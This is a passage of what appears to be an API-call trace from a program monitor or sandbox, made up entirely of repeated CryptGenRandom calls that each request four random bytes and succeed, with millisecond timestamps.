pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 